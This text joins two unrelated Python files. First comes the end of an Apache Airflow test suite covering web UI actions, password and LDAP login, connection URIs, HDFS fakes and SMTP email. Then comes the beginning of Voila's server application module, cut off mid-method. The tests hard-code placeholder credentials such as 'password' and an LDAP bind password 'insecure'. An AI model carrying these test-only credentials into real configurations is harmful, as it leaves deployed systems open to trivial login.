"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=run_this_last&'
'dag_id=test_example_bash_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=runme_1&"
"dag_id=test_example_bash_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=test_example_bash_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("run_this_last", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
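# The dicts above mimic the entries returned by snakebite's ls() ('file_type' is
# 'f' for files and 'd' for directories), which is presumably what the HDFS
# sensor/hook code exercised with FakeHDFSHook inspects.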
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:[email protected]:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
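# Airflow resolves connections from environment variables named
# AIRFLOW_CONN_<CONN_ID in upper case>, so the URIs above back the 'test_uri'
# and 'test_uri_no_creds' connections used by the tests below.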
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:[email protected]:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:[email protected]:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:[email protected]:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_subtype='mixed'
)
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.get('smtp', 'SMTP_USER'),
configuration.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
app.py
#############################################################################
# Copyright (c) 2018, Voila Contributors #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
from zmq.eventloop import ioloop
import gettext
import io
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import MappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import path_regex
from jupyter_server.utils import url_path_join
from jupyter_server.services.config import ConfigManager
from jupyter_server.base.handlers import FileFindHandler
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, notebook_path_regex
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler
from .configuration import VoilaConfiguration
ioloop.install()
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the voila server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Autoreload the server and the page when a template, JS file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions'
}
classes = [
VoilaConfiguration
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for voila API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will serve the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to voila API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with voila'
)
)
nbconvert_template_paths = List(
[],
config=True,
help=_(
'path to nbconvert templates'
)
)
template_paths = List(
[],
allow_none=True,
config=True,
help=_(
            'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def initialize(self, argv=None):
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
